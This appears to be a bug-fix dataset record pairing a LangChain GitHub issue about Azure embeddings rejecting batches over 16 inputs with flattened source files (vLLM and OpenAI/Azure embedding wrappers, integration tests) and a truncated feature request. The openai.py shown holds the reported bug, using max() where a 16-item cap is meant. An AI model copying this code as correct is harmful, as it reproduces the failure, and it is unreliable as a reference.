from typing import Any, Dict, List, Optional from langchain.callbacks.manager import CallbackManagerForLLMRun from langchain.llms.base import BaseLLM from langchain.llms.openai import BaseOpenAI from langchain.pydantic_v1 import Field, root_validator from langchain.schema.output import Generation, LLMResult class VLLM(BaseLLM): """VLLM language model.""" model: str = "" """The name or path of a HuggingFace Transformers model.""" tensor_parallel_size: Optional[int] = 1 """The number of GPUs to use for distributed execution with tensor parallelism.""" trust_remote_code: Optional[bool] = False """Trust remote code (e.g., from HuggingFace) when downloading the model and tokenizer.""" n: int = 1 """Number of output sequences to return for the given prompt.""" best_of: Optional[int] = None """Number of output sequences that are generated from the prompt.""" presence_penalty: float = 0.0 """Float that penalizes new tokens based on whether they appear in the generated text so far""" frequency_penalty: float = 0.0 """Float that penalizes new tokens based on their frequency in the generated text so far""" temperature: float = 1.0 """Float that controls the randomness of the sampling.""" top_p: float = 1.0 """Float that controls the cumulative probability of the top tokens to consider.""" top_k: int = -1 """Integer that controls the number of top tokens to consider.""" use_beam_search: bool = False """Whether to use beam search instead of sampling.""" stop: Optional[List[str]] = None """List of strings that stop the generation when they are generated.""" ignore_eos: bool = False """Whether to ignore the EOS token and continue generating tokens after the EOS token is generated.""" max_new_tokens: int = 512 """Maximum number of tokens to generate per output sequence.""" logprobs: Optional[int] = None """Number of log probabilities to return per output token.""" dtype: str = "auto" """The data type for the model weights and activations.""" download_dir: Optional[str] = None """Directory to download and load the weights. (Default to the default cache dir of huggingface)""" vllm_kwargs: Dict[str, Any] = Field(default_factory=dict) """Holds any model parameters valid for `vllm.LLM` call not explicitly specified.""" client: Any #: :meta private: @root_validator() def validate_environment(cls, values: Dict) -> Dict: """Validate that python package exists in environment.""" try: from vllm import LLM as VLLModel except ImportError: raise ImportError( "Could not import vllm python package. " "Please install it with `pip install vllm`." ) values["client"] = VLLModel( model=values["model"], tensor_parallel_size=values["tensor_parallel_size"], trust_remote_code=values["trust_remote_code"], dtype=values["dtype"], download_dir=values["download_dir"], **values["vllm_kwargs"], ) return values @property def _default_params(self) -> Dict[str, Any]: """Get the default parameters for calling vllm.""" return { "n": self.n, "best_of": self.best_of, "max_tokens": self.max_new_tokens, "top_k": self.top_k, "top_p": self.top_p, "temperature": self.temperature, "presence_penalty": self.presence_penalty, "frequency_penalty": self.frequency_penalty, "stop": self.stop, "ignore_eos": self.ignore_eos, "use_beam_search": self.use_beam_search, "logprobs": self.logprobs, } def _generate( self, prompts: List[str], stop: Optional[List[str]] = None, run_manager: Optional[CallbackManagerForLLMRun] = None, **kwargs: Any, ) -> LLMResult: """Run the LLM on the given prompt and input.""" from vllm import SamplingParams # build sampling parameters params = {**self._default_params, **kwargs, "stop": stop} sampling_params = SamplingParams(**params) # call the model outputs = self.client.generate(prompts, sampling_params) generations = [] for output in outputs: text = output.outputs[0].text generations.append([Generation(text=text)]) return LLMResult(generations=generations) @property def _llm_type(self) -> str: """Return type of llm.""" return "vllm" class VLLMOpenAI(BaseOpenAI): """vLLM OpenAI-compatible API client""" @property def _invocation_params(self) -> Dict[str, Any]: """Get the parameters used to invoke the model.""" openai_creds: Dict[str, Any] = { "api_key": self.openai_api_key, "api_base": self.openai_api_base, } return { "model": self.model_name, **openai_creds, **self._default_params, "logit_bias": None, } @property def _llm_type(self) -> str: """Return type of llm.""" return "vllm-openai"
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
13,539
New update broke embeddings models
### System Info LangChain version: 0.0.337 Python version: 3.10.13 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction db = Chroma.from_documents(docs, AzureOpenAIEmbeddings()) ### Expected behavior This worked on previous versions of LangChain using OpenAIEmbeddings(), but now I get this error BadRequestError: Error code: 400 - {'error': {'message': 'Too many inputs. The max number of inputs is 16. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.', 'type': 'invalid_request_error', 'param': None, 'code': None}}
https://github.com/langchain-ai/langchain/issues/13539
https://github.com/langchain-ai/langchain/pull/13425
e53f59f01a2d5020e4a3248380d7a04891c8be1f
6bf9b2cb51f94872bb251ba22fe7e3aefb753d43
"2023-11-17T21:47:33Z"
python
"2023-11-20T02:34:51Z"
libs/langchain/langchain/embeddings/azure_openai.py
"""Azure OpenAI embeddings wrapper.""" from __future__ import annotations import os import warnings from typing import Dict, Optional, Union from langchain.embeddings.openai import OpenAIEmbeddings from langchain.pydantic_v1 import Field, root_validator from langchain.utils import get_from_dict_or_env from langchain.utils.openai import is_openai_v1 class AzureOpenAIEmbeddings(OpenAIEmbeddings): """`Azure OpenAI` Embeddings API.""" azure_endpoint: Union[str, None] = None """Your Azure endpoint, including the resource. Automatically inferred from env var `AZURE_OPENAI_ENDPOINT` if not provided. Example: `https://example-resource.azure.openai.com/` """ deployment: Optional[str] = Field(default=None, alias="azure_deployment") """A model deployment. If given sets the base client URL to include `/deployments/{azure_deployment}`. Note: this means you won't be able to use non-deployment endpoints. """ openai_api_key: Union[str, None] = Field(default=None, alias="api_key") """Automatically inferred from env var `AZURE_OPENAI_API_KEY` if not provided.""" azure_ad_token: Union[str, None] = None """Your Azure Active Directory token. Automatically inferred from env var `AZURE_OPENAI_AD_TOKEN` if not provided. For more: https://www.microsoft.com/en-us/security/business/identity-access/microsoft-entra-id. """ # noqa: E501 azure_ad_token_provider: Union[str, None] = None """A function that returns an Azure Active Directory token. Will be invoked on every request. """ openai_api_version: Optional[str] = Field(default=None, alias="api_version") """Automatically inferred from env var `OPENAI_API_VERSION` if not provided.""" validate_base_url: bool = True @root_validator() def validate_environment(cls, values: Dict) -> Dict: """Validate that api key and python package exists in environment.""" # Check OPENAI_KEY for backwards compatibility. # TODO: Remove OPENAI_API_KEY support to avoid possible conflict when using # other forms of azure credentials. values["openai_api_key"] = ( values["openai_api_key"] or os.getenv("AZURE_OPENAI_API_KEY") or os.getenv("OPENAI_API_KEY") ) values["openai_api_base"] = values["openai_api_base"] or os.getenv( "OPENAI_API_BASE" ) values["openai_api_version"] = values["openai_api_version"] or os.getenv( "OPENAI_API_VERSION", default="2023-05-15" ) values["openai_api_type"] = get_from_dict_or_env( values, "openai_api_type", "OPENAI_API_TYPE", default="azure" ) values["openai_organization"] = ( values["openai_organization"] or os.getenv("OPENAI_ORG_ID") or os.getenv("OPENAI_ORGANIZATION") ) values["openai_proxy"] = get_from_dict_or_env( values, "openai_proxy", "OPENAI_PROXY", default="", ) values["azure_endpoint"] = values["azure_endpoint"] or os.getenv( "AZURE_OPENAI_ENDPOINT" ) values["azure_ad_token"] = values["azure_ad_token"] or os.getenv( "AZURE_OPENAI_AD_TOKEN" ) try: import openai except ImportError: raise ImportError( "Could not import openai python package. " "Please install it with `pip install openai`." ) if is_openai_v1(): # For backwards compatibility. Before openai v1, no distinction was made # between azure_endpoint and base_url (openai_api_base). openai_api_base = values["openai_api_base"] if openai_api_base and values["validate_base_url"]: if "/openai" not in openai_api_base: values["openai_api_base"] += "/openai" warnings.warn( "As of openai>=1.0.0, Azure endpoints should be specified via " f"the `azure_endpoint` param not `openai_api_base` " f"(or alias `base_url`). Updating `openai_api_base` from " f"{openai_api_base} to {values['openai_api_base']}." ) if values["deployment"]: warnings.warn( "As of openai>=1.0.0, if `deployment` (or alias " "`azure_deployment`) is specified then " "`openai_api_base` (or alias `base_url`) should not be. " "Instead use `deployment` (or alias `azure_deployment`) " "and `azure_endpoint`." ) if values["deployment"] not in values["openai_api_base"]: warnings.warn( "As of openai>=1.0.0, if `openai_api_base` " "(or alias `base_url`) is specified it is expected to be " "of the form " "https://example-resource.azure.openai.com/openai/deployments/example-deployment. " # noqa: E501 f"Updating {openai_api_base} to " f"{values['openai_api_base']}." ) values["openai_api_base"] += ( "/deployments/" + values["deployment"] ) values["deployment"] = None client_params = { "api_version": values["openai_api_version"], "azure_endpoint": values["azure_endpoint"], "azure_deployment": values["deployment"], "api_key": values["openai_api_key"], "azure_ad_token": values["azure_ad_token"], "azure_ad_token_provider": values["azure_ad_token_provider"], "organization": values["openai_organization"], "base_url": values["openai_api_base"], "timeout": values["request_timeout"], "max_retries": values["max_retries"], "default_headers": values["default_headers"], "default_query": values["default_query"], "http_client": values["http_client"], } values["client"] = openai.AzureOpenAI(**client_params).embeddings values["async_client"] = openai.AsyncAzureOpenAI(**client_params).embeddings else: values["client"] = openai.Embedding return values @property def _llm_type(self) -> str: return "azure-openai-chat"
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
13,539
New update broke embeddings models
### System Info LangChain version: 0.0.337 Python version: 3.10.13 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction db = Chroma.from_documents(docs, AzureOpenAIEmbeddings()) ### Expected behavior This worked on previous versions of LangChain using OpenAIEmbeddings(), but now I get this error BadRequestError: Error code: 400 - {'error': {'message': 'Too many inputs. The max number of inputs is 16. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.', 'type': 'invalid_request_error', 'param': None, 'code': None}}
https://github.com/langchain-ai/langchain/issues/13539
https://github.com/langchain-ai/langchain/pull/13425
e53f59f01a2d5020e4a3248380d7a04891c8be1f
6bf9b2cb51f94872bb251ba22fe7e3aefb753d43
"2023-11-17T21:47:33Z"
python
"2023-11-20T02:34:51Z"
libs/langchain/langchain/embeddings/openai.py
from __future__ import annotations import logging import os import warnings from importlib.metadata import version from typing import ( Any, Callable, Dict, List, Literal, Mapping, Optional, Sequence, Set, Tuple, Union, cast, ) import numpy as np from packaging.version import Version, parse from tenacity import ( AsyncRetrying, before_sleep_log, retry, retry_if_exception_type, stop_after_attempt, wait_exponential, ) from langchain.pydantic_v1 import BaseModel, Extra, Field, root_validator from langchain.schema.embeddings import Embeddings from langchain.utils import get_from_dict_or_env, get_pydantic_field_names logger = logging.getLogger(__name__) def _create_retry_decorator(embeddings: OpenAIEmbeddings) -> Callable[[Any], Any]: import openai min_seconds = 4 max_seconds = 10 # Wait 2^x * 1 second between each retry starting with # 4 seconds, then up to 10 seconds, then 10 seconds afterwards return retry( reraise=True, stop=stop_after_attempt(embeddings.max_retries), wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds), retry=( retry_if_exception_type(openai.error.Timeout) | retry_if_exception_type(openai.error.APIError) | retry_if_exception_type(openai.error.APIConnectionError) | retry_if_exception_type(openai.error.RateLimitError) | retry_if_exception_type(openai.error.ServiceUnavailableError) ), before_sleep=before_sleep_log(logger, logging.WARNING), ) def _async_retry_decorator(embeddings: OpenAIEmbeddings) -> Any: import openai min_seconds = 4 max_seconds = 10 # Wait 2^x * 1 second between each retry starting with # 4 seconds, then up to 10 seconds, then 10 seconds afterwards async_retrying = AsyncRetrying( reraise=True, stop=stop_after_attempt(embeddings.max_retries), wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds), retry=( retry_if_exception_type(openai.error.Timeout) | retry_if_exception_type(openai.error.APIError) | retry_if_exception_type(openai.error.APIConnectionError) | retry_if_exception_type(openai.error.RateLimitError) | retry_if_exception_type(openai.error.ServiceUnavailableError) ), before_sleep=before_sleep_log(logger, logging.WARNING), ) def wrap(func: Callable) -> Callable: async def wrapped_f(*args: Any, **kwargs: Any) -> Callable: async for _ in async_retrying: return await func(*args, **kwargs) raise AssertionError("this is unreachable") return wrapped_f return wrap # https://stackoverflow.com/questions/76469415/getting-embeddings-of-length-1-from-langchain-openaiembeddings def _check_response(response: dict, skip_empty: bool = False) -> dict: if any(len(d["embedding"]) == 1 for d in response["data"]) and not skip_empty: import openai raise openai.error.APIError("OpenAI API returned an empty embedding") return response def embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any: """Use tenacity to retry the embedding call.""" if _is_openai_v1(): return embeddings.client.create(**kwargs) retry_decorator = _create_retry_decorator(embeddings) @retry_decorator def _embed_with_retry(**kwargs: Any) -> Any: response = embeddings.client.create(**kwargs) return _check_response(response, skip_empty=embeddings.skip_empty) return _embed_with_retry(**kwargs) async def async_embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any: """Use tenacity to retry the embedding call.""" if _is_openai_v1(): return await embeddings.async_client.create(**kwargs) @_async_retry_decorator(embeddings) async def _async_embed_with_retry(**kwargs: Any) -> Any: response = await embeddings.client.acreate(**kwargs) return _check_response(response, skip_empty=embeddings.skip_empty) return await _async_embed_with_retry(**kwargs) def _is_openai_v1() -> bool: _version = parse(version("openai")) return _version >= Version("1.0.0") class OpenAIEmbeddings(BaseModel, Embeddings): """OpenAI embedding models. To use, you should have the ``openai`` python package installed, and the environment variable ``OPENAI_API_KEY`` set with your API key or pass it as a named parameter to the constructor. Example: .. code-block:: python from langchain.embeddings import OpenAIEmbeddings openai = OpenAIEmbeddings(openai_api_key="my-api-key") In order to use the library with Microsoft Azure endpoints, you need to set the OPENAI_API_TYPE, OPENAI_API_BASE, OPENAI_API_KEY and OPENAI_API_VERSION. The OPENAI_API_TYPE must be set to 'azure' and the others correspond to the properties of your endpoint. In addition, the deployment name must be passed as the model parameter. Example: .. code-block:: python import os os.environ["OPENAI_API_TYPE"] = "azure" os.environ["OPENAI_API_BASE"] = "https://<your-endpoint.openai.azure.com/" os.environ["OPENAI_API_KEY"] = "your AzureOpenAI key" os.environ["OPENAI_API_VERSION"] = "2023-05-15" os.environ["OPENAI_PROXY"] = "http://your-corporate-proxy:8080" from langchain.embeddings.openai import OpenAIEmbeddings embeddings = OpenAIEmbeddings( deployment="your-embeddings-deployment-name", model="your-embeddings-model-name", openai_api_base="https://your-endpoint.openai.azure.com/", openai_api_type="azure", ) text = "This is a test query." query_result = embeddings.embed_query(text) """ client: Any = Field(default=None, exclude=True) #: :meta private: async_client: Any = Field(default=None, exclude=True) #: :meta private: model: str = "text-embedding-ada-002" # to support Azure OpenAI Service custom deployment names deployment: Optional[str] = model # TODO: Move to AzureOpenAIEmbeddings. openai_api_version: Optional[str] = Field(default=None, alias="api_version") """Automatically inferred from env var `OPENAI_API_VERSION` if not provided.""" # to support Azure OpenAI Service custom endpoints openai_api_base: Optional[str] = Field(default=None, alias="base_url") """Base URL path for API requests, leave blank if not using a proxy or service emulator.""" # to support Azure OpenAI Service custom endpoints openai_api_type: Optional[str] = None # to support explicit proxy for OpenAI openai_proxy: Optional[str] = None embedding_ctx_length: int = 8191 """The maximum number of tokens to embed at once.""" openai_api_key: Optional[str] = Field(default=None, alias="api_key") """Automatically inferred from env var `OPENAI_API_KEY` if not provided.""" openai_organization: Optional[str] = Field(default=None, alias="organization") """Automatically inferred from env var `OPENAI_ORG_ID` if not provided.""" allowed_special: Union[Literal["all"], Set[str]] = set() disallowed_special: Union[Literal["all"], Set[str], Sequence[str]] = "all" chunk_size: int = 1000 """Maximum number of texts to embed in each batch""" max_retries: int = 2 """Maximum number of retries to make when generating.""" request_timeout: Optional[Union[float, Tuple[float, float], Any]] = Field( default=None, alias="timeout" ) """Timeout for requests to OpenAI completion API. Can be float, httpx.Timeout or None.""" headers: Any = None tiktoken_model_name: Optional[str] = None """The model name to pass to tiktoken when using this class. Tiktoken is used to count the number of tokens in documents to constrain them to be under a certain limit. By default, when set to None, this will be the same as the embedding model name. However, there are some cases where you may want to use this Embedding class with a model name not supported by tiktoken. This can include when using Azure embeddings or when using one of the many model providers that expose an OpenAI-like API but with different models. In those cases, in order to avoid erroring when tiktoken is called, you can specify a model name to use here.""" show_progress_bar: bool = False """Whether to show a progress bar when embedding.""" model_kwargs: Dict[str, Any] = Field(default_factory=dict) """Holds any model parameters valid for `create` call not explicitly specified.""" skip_empty: bool = False """Whether to skip empty strings when embedding or raise an error. Defaults to not skipping.""" default_headers: Union[Mapping[str, str], None] = None default_query: Union[Mapping[str, object], None] = None # Configure a custom httpx client. See the # [httpx documentation](https://www.python-httpx.org/api/#client) for more details. http_client: Union[Any, None] = None """Optional httpx.Client.""" class Config: """Configuration for this pydantic object.""" extra = Extra.forbid allow_population_by_field_name = True @root_validator(pre=True) def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]: """Build extra kwargs from additional params that were passed in.""" all_required_field_names = get_pydantic_field_names(cls) extra = values.get("model_kwargs", {}) for field_name in list(values): if field_name in extra: raise ValueError(f"Found {field_name} supplied twice.") if field_name not in all_required_field_names: warnings.warn( f"""WARNING! {field_name} is not default parameter. {field_name} was transferred to model_kwargs. Please confirm that {field_name} is what you intended.""" ) extra[field_name] = values.pop(field_name) invalid_model_kwargs = all_required_field_names.intersection(extra.keys()) if invalid_model_kwargs: raise ValueError( f"Parameters {invalid_model_kwargs} should be specified explicitly. " f"Instead they were passed in as part of `model_kwargs` parameter." ) values["model_kwargs"] = extra return values @root_validator() def validate_environment(cls, values: Dict) -> Dict: """Validate that api key and python package exists in environment.""" values["openai_api_key"] = get_from_dict_or_env( values, "openai_api_key", "OPENAI_API_KEY" ) values["openai_api_base"] = values["openai_api_base"] or os.getenv( "OPENAI_API_BASE" ) values["openai_api_type"] = get_from_dict_or_env( values, "openai_api_type", "OPENAI_API_TYPE", default="", ) values["openai_proxy"] = get_from_dict_or_env( values, "openai_proxy", "OPENAI_PROXY", default="", ) if values["openai_api_type"] in ("azure", "azure_ad", "azuread"): default_api_version = "2023-05-15" # Azure OpenAI embedding models allow a maximum of 16 texts # at a time in each batch # See: https://learn.microsoft.com/en-us/azure/ai-services/openai/reference#embeddings values["chunk_size"] = max(values["chunk_size"], 16) else: default_api_version = "" values["openai_api_version"] = get_from_dict_or_env( values, "openai_api_version", "OPENAI_API_VERSION", default=default_api_version, ) # Check OPENAI_ORGANIZATION for backwards compatibility. values["openai_organization"] = ( values["openai_organization"] or os.getenv("OPENAI_ORG_ID") or os.getenv("OPENAI_ORGANIZATION") ) try: import openai except ImportError: raise ImportError( "Could not import openai python package. " "Please install it with `pip install openai`." ) else: if _is_openai_v1(): if values["openai_api_type"] in ("azure", "azure_ad", "azuread"): warnings.warn( "If you have openai>=1.0.0 installed and are using Azure, " "please use the `AzureOpenAIEmbeddings` class." ) client_params = { "api_key": values["openai_api_key"], "organization": values["openai_organization"], "base_url": values["openai_api_base"], "timeout": values["request_timeout"], "max_retries": values["max_retries"], "default_headers": values["default_headers"], "default_query": values["default_query"], "http_client": values["http_client"], } if not values.get("client"): values["client"] = openai.OpenAI(**client_params).embeddings if not values.get("async_client"): values["async_client"] = openai.AsyncOpenAI( **client_params ).embeddings elif not values.get("client"): values["client"] = openai.Embedding else: pass return values @property def _invocation_params(self) -> Dict[str, Any]: if _is_openai_v1(): openai_args: Dict = {"model": self.model, **self.model_kwargs} else: openai_args = { "model": self.model, "request_timeout": self.request_timeout, "headers": self.headers, "api_key": self.openai_api_key, "organization": self.openai_organization, "api_base": self.openai_api_base, "api_type": self.openai_api_type, "api_version": self.openai_api_version, **self.model_kwargs, } if self.openai_api_type in ("azure", "azure_ad", "azuread"): openai_args["engine"] = self.deployment # TODO: Look into proxy with openai v1. if self.openai_proxy: try: import openai except ImportError: raise ImportError( "Could not import openai python package. " "Please install it with `pip install openai`." ) openai.proxy = { "http": self.openai_proxy, "https": self.openai_proxy, } # type: ignore[assignment] # noqa: E501 return openai_args # please refer to # https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb def _get_len_safe_embeddings( self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None ) -> List[List[float]]: embeddings: List[List[float]] = [[] for _ in range(len(texts))] try: import tiktoken except ImportError: raise ImportError( "Could not import tiktoken python package. " "This is needed in order to for OpenAIEmbeddings. " "Please install it with `pip install tiktoken`." ) tokens = [] indices = [] model_name = self.tiktoken_model_name or self.model try: encoding = tiktoken.encoding_for_model(model_name) except KeyError: logger.warning("Warning: model not found. Using cl100k_base encoding.") model = "cl100k_base" encoding = tiktoken.get_encoding(model) for i, text in enumerate(texts): if self.model.endswith("001"): # See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500 # replace newlines, which can negatively affect performance. text = text.replace("\n", " ") token = encoding.encode( text, allowed_special=self.allowed_special, disallowed_special=self.disallowed_special, ) for j in range(0, len(token), self.embedding_ctx_length): tokens.append(token[j : j + self.embedding_ctx_length]) indices.append(i) batched_embeddings: List[List[float]] = [] _chunk_size = chunk_size or self.chunk_size if self.show_progress_bar: try: from tqdm.auto import tqdm _iter = tqdm(range(0, len(tokens), _chunk_size)) except ImportError: _iter = range(0, len(tokens), _chunk_size) else: _iter = range(0, len(tokens), _chunk_size) for i in _iter: response = embed_with_retry( self, input=tokens[i : i + _chunk_size], **self._invocation_params, ) if not isinstance(response, dict): response = response.dict() batched_embeddings.extend(r["embedding"] for r in response["data"]) results: List[List[List[float]]] = [[] for _ in range(len(texts))] num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))] for i in range(len(indices)): if self.skip_empty and len(batched_embeddings[i]) == 1: continue results[indices[i]].append(batched_embeddings[i]) num_tokens_in_batch[indices[i]].append(len(tokens[i])) for i in range(len(texts)): _result = results[i] if len(_result) == 0: average_embedded = embed_with_retry( self, input="", **self._invocation_params, ) if not isinstance(average_embedded, dict): average_embedded = average_embedded.dict() average = average_embedded["data"][0]["embedding"] else: average = np.average(_result, axis=0, weights=num_tokens_in_batch[i]) embeddings[i] = (average / np.linalg.norm(average)).tolist() return embeddings # please refer to # https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb async def _aget_len_safe_embeddings( self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None ) -> List[List[float]]: embeddings: List[List[float]] = [[] for _ in range(len(texts))] try: import tiktoken except ImportError: raise ImportError( "Could not import tiktoken python package. " "This is needed in order to for OpenAIEmbeddings. " "Please install it with `pip install tiktoken`." ) tokens = [] indices = [] model_name = self.tiktoken_model_name or self.model try: encoding = tiktoken.encoding_for_model(model_name) except KeyError: logger.warning("Warning: model not found. Using cl100k_base encoding.") model = "cl100k_base" encoding = tiktoken.get_encoding(model) for i, text in enumerate(texts): if self.model.endswith("001"): # See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500 # replace newlines, which can negatively affect performance. text = text.replace("\n", " ") token = encoding.encode( text, allowed_special=self.allowed_special, disallowed_special=self.disallowed_special, ) for j in range(0, len(token), self.embedding_ctx_length): tokens.append(token[j : j + self.embedding_ctx_length]) indices.append(i) batched_embeddings: List[List[float]] = [] _chunk_size = chunk_size or self.chunk_size for i in range(0, len(tokens), _chunk_size): response = await async_embed_with_retry( self, input=tokens[i : i + _chunk_size], **self._invocation_params, ) if not isinstance(response, dict): response = response.dict() batched_embeddings.extend(r["embedding"] for r in response["data"]) results: List[List[List[float]]] = [[] for _ in range(len(texts))] num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))] for i in range(len(indices)): results[indices[i]].append(batched_embeddings[i]) num_tokens_in_batch[indices[i]].append(len(tokens[i])) for i in range(len(texts)): _result = results[i] if len(_result) == 0: average_embedded = embed_with_retry( self, input="", **self._invocation_params, ) if not isinstance(average_embedded, dict): average_embedded = average_embedded.dict() average = average_embedded["data"][0]["embedding"] else: average = np.average(_result, axis=0, weights=num_tokens_in_batch[i]) embeddings[i] = (average / np.linalg.norm(average)).tolist() return embeddings def embed_documents( self, texts: List[str], chunk_size: Optional[int] = 0 ) -> List[List[float]]: """Call out to OpenAI's embedding endpoint for embedding search docs. Args: texts: The list of texts to embed. chunk_size: The chunk size of embeddings. If None, will use the chunk size specified by the class. Returns: List of embeddings, one for each text. """ # NOTE: to keep things simple, we assume the list may contain texts longer # than the maximum context and use length-safe embedding function. engine = cast(str, self.deployment) return self._get_len_safe_embeddings(texts, engine=engine) async def aembed_documents( self, texts: List[str], chunk_size: Optional[int] = 0 ) -> List[List[float]]: """Call out to OpenAI's embedding endpoint async for embedding search docs. Args: texts: The list of texts to embed. chunk_size: The chunk size of embeddings. If None, will use the chunk size specified by the class. Returns: List of embeddings, one for each text. """ # NOTE: to keep things simple, we assume the list may contain texts longer # than the maximum context and use length-safe embedding function. engine = cast(str, self.deployment) return await self._aget_len_safe_embeddings(texts, engine=engine) def embed_query(self, text: str) -> List[float]: """Call out to OpenAI's embedding endpoint for embedding query text. Args: text: The text to embed. Returns: Embedding for the text. """ return self.embed_documents([text])[0] async def aembed_query(self, text: str) -> List[float]: """Call out to OpenAI's embedding endpoint async for embedding query text. Args: text: The text to embed. Returns: Embedding for the text. """ embeddings = await self.aembed_documents([text]) return embeddings[0]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
13,539
New update broke embeddings models
### System Info LangChain version: 0.0.337 Python version: 3.10.13 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction db = Chroma.from_documents(docs, AzureOpenAIEmbeddings()) ### Expected behavior This worked on previous versions of LangChain using OpenAIEmbeddings(), but now I get this error BadRequestError: Error code: 400 - {'error': {'message': 'Too many inputs. The max number of inputs is 16. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.', 'type': 'invalid_request_error', 'param': None, 'code': None}}
https://github.com/langchain-ai/langchain/issues/13539
https://github.com/langchain-ai/langchain/pull/13425
e53f59f01a2d5020e4a3248380d7a04891c8be1f
6bf9b2cb51f94872bb251ba22fe7e3aefb753d43
"2023-11-17T21:47:33Z"
python
"2023-11-20T02:34:51Z"
libs/langchain/tests/integration_tests/embeddings/test_azure_openai.py
"""Test openai embeddings.""" import os from typing import Any import numpy as np import pytest from langchain.embeddings import AzureOpenAIEmbeddings def _get_embeddings(**kwargs: Any) -> AzureOpenAIEmbeddings: return AzureOpenAIEmbeddings( openai_api_version=os.environ.get("AZURE_OPENAI_API_VERSION", ""), **kwargs, ) def test_azure_openai_embedding_documents() -> None: """Test openai embeddings.""" documents = ["foo bar"] embedding = _get_embeddings() output = embedding.embed_documents(documents) assert len(output) == 1 assert len(output[0]) == 1536 def test_azure_openai_embedding_documents_multiple() -> None: """Test openai embeddings.""" documents = ["foo bar", "bar foo", "foo"] embedding = _get_embeddings(chunk_size=2) embedding.embedding_ctx_length = 8191 output = embedding.embed_documents(documents) assert len(output) == 3 assert len(output[0]) == 1536 assert len(output[1]) == 1536 assert len(output[2]) == 1536 @pytest.mark.asyncio async def test_azure_openai_embedding_documents_async_multiple() -> None: """Test openai embeddings.""" documents = ["foo bar", "bar foo", "foo"] embedding = _get_embeddings(chunk_size=2) embedding.embedding_ctx_length = 8191 output = await embedding.aembed_documents(documents) assert len(output) == 3 assert len(output[0]) == 1536 assert len(output[1]) == 1536 assert len(output[2]) == 1536 def test_azure_openai_embedding_query() -> None: """Test openai embeddings.""" document = "foo bar" embedding = _get_embeddings() output = embedding.embed_query(document) assert len(output) == 1536 @pytest.mark.asyncio async def test_azure_openai_embedding_async_query() -> None: """Test openai embeddings.""" document = "foo bar" embedding = _get_embeddings() output = await embedding.aembed_query(document) assert len(output) == 1536 @pytest.mark.skip(reason="Unblock scheduled testing. TODO: fix.") def test_azure_openai_embedding_with_empty_string() -> None: """Test openai embeddings with empty string.""" import openai document = ["", "abc"] embedding = _get_embeddings() output = embedding.embed_documents(document) assert len(output) == 2 assert len(output[0]) == 1536 expected_output = openai.Embedding.create(input="", model="text-embedding-ada-002")[ "data" ][0]["embedding"] assert np.allclose(output[0], expected_output) assert len(output[1]) == 1536 def test_embed_documents_normalized() -> None: output = _get_embeddings().embed_documents(["foo walked to the market"]) assert np.isclose(np.linalg.norm(output[0]), 1.0) def test_embed_query_normalized() -> None: output = _get_embeddings().embed_query("foo walked to the market") assert np.isclose(np.linalg.norm(output), 1.0)
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,814
Create retriever for Outline to ask questions on knowledge base
### Feature request A retriever for documents from [Outline](https://github.com/outline/outline). The API has a search endpoint which allows this to be possible: https://www.getoutline.com/developers#tag/Documents/paths/~1documents.search/post The implementation will be similar to the Wikipedia retriever: https://python.langchain.com/docs/integrations/retrievers/wikipedia ### Motivation Outline is an open source project that let's you create a knowledge base, like a wiki. Creating a retriever for Outline will let your team interact with your knowledge base using an LLM. ### Your contribution PR will be coming soon.
https://github.com/langchain-ai/langchain/issues/11814
https://github.com/langchain-ai/langchain/pull/13889
f2af82058f4904b20ae95c6d17d2b65666bf882a
935f78c9449c40473541666a8b0a0dc61873b0eb
"2023-10-15T01:58:24Z"
python
"2023-11-27T02:56:12Z"
docs/docs/integrations/retrievers/outline.ipynb
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
11,814
Create retriever for Outline to ask questions on knowledge base
